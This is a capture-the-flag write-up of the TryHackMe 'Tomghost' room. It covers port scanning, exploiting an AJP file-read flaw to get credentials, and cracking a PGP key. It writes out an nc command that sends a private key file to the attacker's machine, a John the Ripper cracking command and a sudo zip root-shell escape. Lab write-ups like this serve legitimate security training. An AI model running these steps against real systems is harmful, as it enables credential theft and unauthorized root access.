###### tags: `write up` # Tryhackme Tomghost wirteup --- ## <font color=red>Step1. Recon</font> ``` nmap -sS -sV -T5 <ip> ``` ![](https://i.imgur.com/OPH2Zwf.png) <font size=4.5>We can see that there are 4 ports opened and 2 of them were interesting-8080, 8009.</font> --- ## <font color=red>Step2. Enumerating</font> <font size=4.5>The services that run on port 8009 and 8080 lead us to learn Apache Jserv protocol. The Apache Tomcat server is used for Java-based web application, Apache Jserv Protocol (AJP) is used to communicate between Tomcat and Apache webserver. The protocol by default runs on port 8009.</font> <font size=4.5>Gobuster on the webservice can't get anything.It's truley a rabbit hole.On the other hand, let's move our attention to <font color=red>AJP vulnerability.</font></font> <font size=4.5>Aquering some information from exploit db, I found that there is a File Read/Inclusion vulnerability with this AJP server. In order to utilize this vulnerability, <font color=red>I have to find a critical/configuration file which can provide me useful information-----</WEB-info/web.xml></font>may be a good choice.</font> ![](https://i.imgur.com/FnKYAQh.png) ![](https://i.imgur.com/LySpa8L.png) <font size=4.5> Fortunately, got some credential here. Let's try these with ssh here.</font> ![](https://i.imgur.com/mOr4eKv.png) <font size=4.5>There is a directory called merlin and I assume that it may be critical user for this time. Then I move in to the directory, I see two interesting files.</font> ![](https://i.imgur.com/1Ju2voX.png) <font size=4.5 color=orange> **Additional information: pgp is a kind of crypto software which will first generate a key pair. Public key for encrypt and private key for decrypt.**</font><font size=4.5> Opening the tryhackme.asc file, it is truley a private key file.</font> --- ## <font color=red>Step2. Break the private key</font> <font size=4.5 >In order to break the private key, First of all, we have to transfer the tryhackme.asc file to our kali machine.</font> ``` #on the remote host nc 10.4.36.186 443 < tryhackme.asc #on the local host sudo nc -lvnp 443 > tryhackme.asc ``` ![](https://i.imgur.com/GK2zamH.png) <font size=4.5 >Extracting the hash from the key using the GPG2John tool:</font> ``` gpg2john tryhackme.asc > hashes.txt ``` ![](https://i.imgur.com/zYdZ5Ra.png) <font size=4.5>Using John the Ripper to crack the previously found hashes</font> ``` john --wordlist=/usr/share/wordlists/rockyou.txt <file> ``` ![](https://i.imgur.com/8YlrkaB.png) <font size=4.5>Importing the key and using it to decrypt the credentials:</font> ``` gpg --import tryhackme.asc gpg --decrypt credential.pgp ``` ![](https://i.imgur.com/ZEIxAwn.png) <font size=4.5>Now we found merlin's user password which enables us to change ourself to merlin.</font> ![](https://i.imgur.com/XotKcnq.png) ## <font color=red>Step3. Priviledge escalation</font> --- <font size=4.5 color=red>When running sudo -l, it appears that the merlin user can execute the Zip binary as root:</font> ![](https://i.imgur.com/k3bDJpo.png) <font size=4.5>Using GTOFbins to search possible approaches for priviledge escalation. [GTOFbins](https://gtfobins.github.io/gtfobins/zip/#sudo)</font> ![](https://i.imgur.com/LoB9gsi.png) <font size=4.5>This effectively provides arbitrary command execution. Running the commands mentioned above:</font> ``` TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #' ``` ![](https://i.imgur.com/u19jeNg.png) ROOT~~~